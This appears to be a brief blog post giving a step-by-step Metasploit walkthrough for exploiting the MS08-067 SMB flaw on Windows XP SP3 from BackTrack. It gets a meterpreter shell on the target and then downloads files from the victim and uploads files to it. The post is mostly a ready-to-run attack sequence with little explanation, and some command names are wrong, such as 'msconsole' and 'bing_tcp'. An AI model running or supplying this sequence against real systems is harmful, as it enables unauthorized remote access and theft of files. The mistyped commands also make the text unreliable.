Mar 13

Hacking XP SP3 with BackTrack Using Metasploit

Shell access hacking in metasploit XP SP3
Enter msconsole.
Use windows/smb/ms08_067_netapi <enter>
show exploits shows what exploits can be used.
set payload windows/meterpreter/bind_tcp <enter>
This will allow you to use meterpreter to connect to the shell of the XP box
Show options <enter>
set RPORT 445 (Optional, but recommended) <enter>
set RHOST (remote host) *the machine you are attacking’s IP address* <enter>
set LHOST (local host) *your backtrack machine’s IP address* <enter>
exploit <enter>
This will give you access into the XP box
if you want shell access, type in shell.
NOTE: when you type in shell, you will need to use DOS commands! dir- will display folder contents (ls)

To transfer files, you MUST NOT be in meterpreter. If you are in the Windows shell, type “exit” to get out
Syntax:
download c:\\FILE\PATH\TO\FILE /LOCATION/TO/SAVE/ON/BackTrack
upload /FILE/ON/BackTrack c:\\LOCATION\TO\COPY
For a video, see http://www.youtube.com/watch?v=fj4ckhacLrE except use “set payload windows/meterpreter/bing_tcp <enter>” for whatever they use for the payload. I’ll possibly post a video later.

More Info:
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Meterpreter_Basics